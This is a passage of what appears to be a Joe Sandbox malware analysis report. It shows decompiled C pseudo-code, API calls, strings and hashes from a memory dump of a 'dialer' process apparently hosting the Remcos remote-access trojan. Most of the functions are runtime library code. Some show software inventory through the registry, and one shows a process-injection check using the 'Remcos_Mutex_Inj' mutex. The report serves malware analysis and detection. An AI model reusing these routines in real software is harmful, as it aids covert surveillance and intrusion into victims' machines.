API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
Instruction ID: 384e4941bdc51aec785ae54d0846d7427833242b9ed721b5f4b9d7b17cf01d93
Opcode Fuzzy Hash: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
Instruction Fuzzy Hash: 28216B31104209BFDB096FA4ED0DAAA7B75FB04342F10413EFA16901B1DBB6DAA0DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E23C, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0x3dad585e
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577a8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0042F61B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0043DFD9(_t172, 1, 4);
					L0043EE85(_t170);
					_v32 = E0043DFD9(_t172, 0x180, 2);
					L0043EE85(_t170);
					_v36 = E0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_v40 = E0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_t197 = E0043DFD9(_t172, 0x101, 1);
					_v52 = _t197;
					L0043EE85(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						L0043EE85(_v44);
						L0043EE85(_v32);
						L0043EE85(_v36);
						L0043EE85(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										L0043EE85( *(_t215 + 0x90) - 0xfe);
										L0043EE85( *(_t215 + 0x94) - 0x80);
										L0043EE85( *(_t215 + 0x98) - 0x80);
										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								L0043EE85(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

APIs

_free.LIBCMT ref: 0043E2AC
_free.LIBCMT ref: 0043E2C2
_free.LIBCMT ref: 0043E2D3
_free.LIBCMT ref: 0043E2E4
_free.LIBCMT ref: 0043E2FB
GetCPInfo.KERNEL32(?,?), ref: 0043E343

Part of subcall function 0044A26E: _free.LIBCMT ref: 0044A2D9

_free.LIBCMT ref: 0043E4EF
_free.LIBCMT ref: 0043E502
_free.LIBCMT ref: 0043E510
_free.LIBCMT ref: 0043E51B
_free.LIBCMT ref: 0043E55D
_free.LIBCMT ref: 0043E565
_free.LIBCMT ref: 0043E56D
_free.LIBCMT ref: 0043E575
_free.LIBCMT ref: 0043E583

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 48956c9e2411e10a48da5b9d5c76fc53aaf0317ab91219b11136f79c5740dde2
Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
Opcode Fuzzy Hash: 48956c9e2411e10a48da5b9d5c76fc53aaf0317ab91219b11136f79c5740dde2
Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041755D, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041755D(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					L00401F4D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E004103AF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E004103AF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E004103AF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E004103AF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E004103AF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E004103AF( &_v88, _v8);
								__eflags = L00409DB7();
								if(__eflags == 0) {
									E004032F1(E00403086(_t129,  &_v208, E00403086(_t129,  &_v232, E00404409(_t129,  &_v256, E00403086(_t129,  &_v280, E00404409(_t129,  &_v304, E00403086(_t129,  &_v328, E00404409(_t129,  &_v352, E00403086(_t129,  &_v376, E00404409(_t129,  &_v400, E00403086(_t129,  &_v424, E00404409(_t129,  &_v448, E00407516( &_v472,  &_v40, __eflags, 0x4659b4), __eflags,  &_v160), _t206, __eflags, 0x4659b4), __eflags,  &_v112), _t206, __eflags, 0x4659b4), __eflags,  &_v184), _t206, __eflags, 0x4659b4), __eflags,  &_v136), _t206, __eflags, 0x4659b4), __eflags,  &_v88), _t206, __eflags, 0x4659b4), _t206, __eflags, "\n"));
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
								}
								RegCloseKey(_v8);
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E004032FA(_t129, _t207, __eflags,  &_v64);
					L00401ED0();
				} else {
					E0040425F(__ebx, _t207, 0x45f714);
				}
				return _t207;
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041757F
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417833
RegCloseKey.ADVAPI32(?), ref: 00417847

Strings

InstallLocation, xrefs: 00417630
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417573
DisplayVersion, xrefs: 0041761B
DisplayName, xrefs: 004175F3
UninstallString, xrefs: 00417654
Publisher, xrefs: 00417606
InstallDate, xrefs: 00417642

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
Instruction ID: 918c60c30167cdbca0fafa00f68e4c19a9dd40daefd47028054c4c048a220fb3
Opcode Fuzzy Hash: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
Instruction Fuzzy Hash: B9813F719101089BDB14EB62DC52AEEB379EF54305F1041AFB50AB21D1EF346F85CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004480F6, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004480F6(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							L0043EE85(_t46);
							E00447332( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							L0043EE85(_t47);
							E004477EC( *((intOrPtr*)(_t74 + 0x88)));
						}
						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							L0043EE85(_t31);
							L0043EE85( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							L0043EE85(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return L0043EE85(_t74);
			}

0x004480fe
0x00448102
0x0044810a
0x00448113
0x00448118
0x0044811f
0x00448127
0x0044812f
0x0044813a
0x00448140
0x00448141
0x00448149
0x00448151
0x0044815c
0x00448162
0x00448166
0x00448171
0x00448177
0x00448118
0x00448178
0x00448180
0x00448193
0x004481a6
0x004481b4
0x004481bf
0x004481c4
0x004481cd
0x004481d5
0x004481d6
0x004481dc
0x004481df
0x004481e2
0x004481e9
0x004481eb
0x004481ef
0x004481f7
0x004481fe
0x00448204
0x00448205
0x00448205
0x0044820c
0x0044820e
0x00448213
0x0044821b
0x00448220
0x00448221
0x00448221
0x00448224
0x00448227
0x0044822a
0x0044822d
0x0044822d
0x0044823f

APIs

___free_lconv_mon.LIBCMT ref: 0044813A

Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
Part of subcall function 00447332: _free.LIBCMT ref: 00447361
Part of subcall function 00447332: _free.LIBCMT ref: 00447373
Part of subcall function 00447332: _free.LIBCMT ref: 00447385
Part of subcall function 00447332: _free.LIBCMT ref: 00447397
Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
Part of subcall function 00447332: _free.LIBCMT ref: 00447403
Part of subcall function 00447332: _free.LIBCMT ref: 00447415
Part of subcall function 00447332: _free.LIBCMT ref: 00447427

_free.LIBCMT ref: 0044812F

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD

_free.LIBCMT ref: 00448151
_free.LIBCMT ref: 00448166
_free.LIBCMT ref: 00448171
_free.LIBCMT ref: 00448193
_free.LIBCMT ref: 004481A6
_free.LIBCMT ref: 004481B4
_free.LIBCMT ref: 004481BF
_free.LIBCMT ref: 004481F7
_free.LIBCMT ref: 004481FE
_free.LIBCMT ref: 0044821B
_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1AD, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040D1AD(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407746("1") != 0) {
					L14:
					L00401EDA( &_a4, _t149, _t159, E00416773(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					L00401ED0();
					if(L00416F6C(_t111) != 0) {
						_push(_t111);
						if(E0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(L0040EE85( &_v1204,  &_a4) != 0) {
						L22:
						L00401ED0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020B5(_t106,  &_v96);
						E00417334(L00401ECB(0x46c500),  &_v96);
						L00401F75( &_v96);
						if(E00413CCA(L00401ECB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
						}
						L00401FA7();
						goto L22;
					}
				}
				L00401F4D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040425F(_t106,  &_v56,  &_v648);
					_t157 = E004022EA( &_v56,  &_v60);
					_t159 = E004022AD( &_v56,  &_v64);
					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(L00409EAE( &_a4) != 0) {
						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
						L00401ED0();
						if(E00407746( &_v1204) == 0) {
							_t149 = 0x45f714;
							if(E00407746(0x45f714) != 0 || L00416F9A(_v676) != 0) {
								L00401ED0();
								L13:
								L00401ED0();
								goto L14;
							} else {
								L00409E58( &_v32);
								L00401ED0();
								break;
							}
						}
						L00401ED0();
						L00401ED0();
						goto L22;
					}
					L00401ED0();
				}
				CloseHandle(_v8);
				_t149 = 0x45f714;
				if(E00407746(0x45f714) != 0) {
					goto L13;
				}
				L00401ED0();
				goto L18;
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D1EE
Process32FirstW.KERNEL32(00000000,?), ref: 0040D209
Process32NextW.KERNEL32(0040CC11,0000022C), ref: 0040D27A
CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
CloseHandle.KERNEL32(00000000), ref: 0040D3FF

Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5

Strings

Program Files (x86)\, xrefs: 0040D373
Remcos_Mutex_Inj, xrefs: 0040D395
Program Files\, xrefs: 0040D361
Inj, xrefs: 0040D3E9

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
API String ID: 193334293-694575909
Opcode ID: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
Opcode Fuzzy Hash: c1ee45c483fb74bc2a0db2c73283c01417bd6b15af02eb149c2665c24deec1e9
Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59

Uniqueness

Uniqueness Score: -1.00%

Function 00447430, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00447430(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0043DFD9(0, 1, 0x50);
					_v8 = _t234;
					L0043EE85(0);
					if(_t234 != 0) {
						_t227 = E0043DFD9(0, 1, 4);
						_v12 = _t227;
						L0043EE85(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0043DFD9(0, 1, 4);
							_v16 = _t232;
							L0043EE85(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044A26E(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044A26E(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044A26E(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044A26E(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044A26E(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044A26E(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044A26E(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044A26E(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044A26E(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044A26E(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044A26E(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044A26E(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044A26E(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044A26E(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044A26E(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044A26E(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044A26E(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044A26E(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
